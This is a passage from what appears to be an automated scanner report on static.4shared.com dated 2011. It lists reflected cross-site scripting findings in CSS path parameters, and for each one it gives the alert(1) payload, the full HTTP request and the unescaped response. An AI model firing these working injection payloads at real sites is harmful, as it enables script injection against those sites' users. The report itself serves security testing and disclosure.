Content-Length: 36190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/coolbuttons.cssebafb"-alert(1)-"74fc1488d18";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.219. http://static.4shared.com/css/features.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d0b9"-alert(1)-"5faf4995697 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css4d0b9"-alert(1)-"5faf4995697/features.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css4d0b9&quot;-alert(1)-&quot;5faf4995697/features.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FFA7B8C14C0841DA4DF96AD5595073B3.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css4d0b9"-alert(1)-"5faf4995697/features.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.220. http://static.4shared.com/css/features.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/features.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79d0d"-alert(1)-"e9d06030ced was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/features.css79d0d"-alert(1)-"e9d06030ced?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/features.css79d0d&quot;-alert(1)-&quot;e9d06030ced
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7754151BBD15078673114ABBBD9C8243.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:55 GMT
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/features.css79d0d"-alert(1)-"e9d06030ced";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.221. http://static.4shared.com/css/indexm.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae0da"-alert(1)-"dfc773bc8e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssae0da"-alert(1)-"dfc773bc8e7/indexm.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssae0da&quot;-alert(1)-&quot;dfc773bc8e7/indexm.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F0322F63B8CACFDC0DAC3DC1897D6ED.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssae0da"-alert(1)-"dfc773bc8e7/indexm.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.222. http://static.4shared.com/css/indexm.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexm.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload adf03"-alert(1)-"db77fbbc575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexm.cssadf03"-alert(1)-"db77fbbc575?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/indexm.cssadf03&quot;-alert(1)-&quot;db77fbbc575
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=39624D051F6790D250B45932474C8DCE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:52 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexm.cssadf03"-alert(1)-"db77fbbc575";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.223. http://static.4shared.com/css/indexn.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c9ed"-alert(1)-"c9db170bdcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css8c9ed"-alert(1)-"c9db170bdcd/indexn.css?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css8c9ed&quot;-alert(1)-&quot;c9db170bdcd/indexn.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E53A1B83159954CF79DC975D021B4F60.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:07 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css8c9ed"-alert(1)-"c9db170bdcd/indexn.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.224. http://static.4shared.com/css/indexn.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/indexn.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c78e"-alert(1)-"58cbf041f37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/indexn.css9c78e"-alert(1)-"58cbf041f37?ver=1610 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /css/indexn.css9c78e&quot;-alert(1)-&quot;58cbf041f37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=179999491542BAC1D4F65691626D2CEE.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:37:10 GMT
Content-Length: 36184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/indexn.css9c78e"-alert(1)-"58cbf041f37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.225. http://static.4shared.com/css/main.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c985c"-alert(1)-"b752c3bde16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssc985c"-alert(1)-"b752c3bde16/main.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssc985c&quot;-alert(1)-&quot;b752c3bde16/main.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=62828B98EDCEF6917906D0ED8AD17B11.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:49 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssc985c"-alert(1)-"b752c3bde16/main.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.226. http://static.4shared.com/css/main.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/main.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf57b"-alert(1)-"ff7366fe274 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/main.csscf57b"-alert(1)-"ff7366fe274?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/main.csscf57b&quot;-alert(1)-&quot;ff7366fe274
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3FD90ABD1F134D0ADB55B51E7E5F639F.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:39:53 GMT
Content-Length: 36155


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/main.csscf57b"-alert(1)-"ff7366fe274";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.227. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a73d5"-alert(1)-"09846515e43 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /cssa73d5&quot;-alert(1)-&quot;09846515e43/mainWithoutCommon.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=F38DB9F45A136E8B221A34E2337C577E.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:21 GMT
Content-Length: 36209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/cssa73d5"-alert(1)-"09846515e43/mainWithoutCommon.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.228. http://static.4shared.com/css/mainWithoutCommon.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/mainWithoutCommon.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33792"-alert(1)-"feb36199e90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/mainWithoutCommon.css33792&quot;-alert(1)-&quot;feb36199e90
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=97181302BAA485314ABDA1BF00198219.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:55:28 GMT
Content-Length: 36220


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/mainWithoutCommon.css33792"-alert(1)-"feb36199e90";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.229. http://static.4shared.com/css/openid.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37d0c"-alert(1)-"a384906c899 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css37d0c"-alert(1)-"a384906c899/openid.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css37d0c&quot;-alert(1)-&quot;a384906c899/openid.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7860F21A48FF0DD57CAE4EFCFF42B9F4.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:16 GMT
Content-Length: 36165


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css37d0c"-alert(1)-"a384906c899/openid.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.230. http://static.4shared.com/css/openid.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/openid.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 872dc"-alert(1)-"012793f9b37 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/openid.css872dc"-alert(1)-"012793f9b37?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/openid.css872dc&quot;-alert(1)-&quot;012793f9b37
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=626301118D083DFBF62DC91BC8AAF9A1.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36154


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/openid.css872dc"-alert(1)-"012793f9b37";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.231. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5430c"-alert(1)-"af2ee37e7b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css5430c&quot;-alert(1)-&quot;af2ee37e7b0/pageDownload1/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B6094042F2C403249AB360C71A1BE8A9.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:17 GMT
Content-Length: 36245


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css5430c"-alert(1)-"af2ee37e7b0/pageDownload1/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function
...[SNIP]...

1.232. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a0a9"-alert(1)-"beb8e3c777b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css?ver=1610 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.4shared.com

Response

HTTP/1.1 404 /css/pageDownload16a0a9&quot;-alert(1)-&quot;beb8e3c777b/download.css
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85F1E680A4F8851A5E53D7C01D5CF5D8.dc293; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:40:20 GMT
Content-Length: 36234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/css/pageDownload16a0a9"-alert(1)-"beb8e3c777b/download.css";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.233. http://static.4shared.com/css/pageDownload1/download.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /css/pageDownload1/download.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb5cd"-alert(1)-"8d2149dd564 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /css/pageDownload1/download.csscb5cd"-alert(1)-"8d2149dd564?ver=1610 HTTP/1.1
